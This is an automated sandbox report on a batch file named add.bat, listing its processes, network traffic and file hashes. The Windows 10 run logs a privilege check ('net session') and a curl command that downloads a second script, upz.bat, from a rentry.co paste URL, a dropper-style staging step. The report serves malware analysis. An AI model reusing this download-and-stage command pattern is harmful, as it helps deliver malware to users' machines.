Malware Analysis Report

2024-11-16 15:44

Sample ID 241104-1h113sybpr
Target add.bat
SHA256 c8badf0124a182162b24435e0d435bee500017573cb5e75ef6cc5f418f91cf4b
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

c8badf0124a182162b24435e0d435bee500017573cb5e75ef6cc5f418f91cf4b

Threat Level: No (potentially) malicious behavior was detected

The file add.bat was found to be: No (potentially) malicious behavior was detected.

Malicious Activity Summary


Delays execution with timeout.exe

Runs net.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-11-04 21:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 21:39

Reported

2024-11-04 21:40

Platform

win7-20240903-en

Max time kernel

51s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

Signatures

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2236 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2236 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2364 wrote to memory of 2776 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2364 wrote to memory of 2776 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2364 wrote to memory of 2776 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2236 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2236 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2236 wrote to memory of 2912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\timeout.exe

timeout /t 4

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 21:39

Reported

2024-11-04 21:40

Platform

win10v2004-20241007-en

Max time kernel

16s

Max time network

18s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

Signatures

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2480 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4416 wrote to memory of 1564 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4416 wrote to memory of 1564 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2480 wrote to memory of 4068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2480 wrote to memory of 1164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2480 wrote to memory of 1164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\system32\curl.exe

curl -s -o upz.bat https://rentry.co/bvkohnim/raw

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.75.40:443 rentry.co tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 40.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\bins\upz.bat

MD5 9068e2de4ddd34f42b793c7da0658e90
SHA1 5cfebfdec1a285c2a6e33c9371aba378edac1c0e
SHA256 8fc6a68f2044da3a872ddaef933b2c97d84d547b93b6f677ad42c3cd236ae46d
SHA512 cd2648b983e6f792c87692d0a483d9fd7dd1233a0ad012eb1ccd7ee1d097d1062927b2d82c45e3466178d2e9030b55399e5faff7f1ca1097f78862e95089bcb4